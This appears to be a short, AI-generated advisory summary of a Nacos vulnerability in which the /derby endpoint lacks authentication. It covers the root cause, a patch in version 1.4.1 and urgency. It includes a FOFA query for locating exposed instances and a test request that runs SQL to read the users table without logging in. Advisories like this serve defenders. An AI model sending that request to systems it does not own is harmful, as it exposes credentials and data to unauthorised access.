This is a summary of the AI-generated 10-question deep analysis. The full version (longer answers, follow-up Q&A, related CVEs) requires login. Read the full analysis β
Q1What is this vulnerability? (Essence + Consequences)
π¨ **Essence**: Alibaba Nacos has an **Access Control Error** (CWE-306). The `ConfigOpsController` allows unauthenticated users to perform dangerous admin operations.β¦
π‘οΈ **Root Cause**: Missing Access Control on specific endpoints. While `/data/remove` is secured, the `/derby` endpoint is **not protected** by `@Secured` annotation.β¦
π **Threshold**: **LOW**. No authentication required. π **Config**: Only requires the service to be running with the default embedded Derby storage. No special configuration needed for exploitation.β¦
π **Self-Check**: Scan for Nacos instances using FOFA (`app="Nacos"`). π§ͺ **Test**: Send a GET request to `/nacos/v1/cs/ops/derby?sql=select * from users`.β¦
π§ **Official Fix**: **YES**. Patched in Nacos version **1.4.1** and later. π’ **Action**: Upgrade immediately. π **PR**: See GitHub PR #4517 for details.β¦
π¨ **Urgency**: **CRITICAL**. Priority: **P1**. β³ **Time**: Patch immediately. π **Risk**: High CVSS score (AV:N/AC:L/PR:N/S:C/C:H/I:N/A:N). π£ **Impact**: Complete data loss or RCE. Do not delay remediation.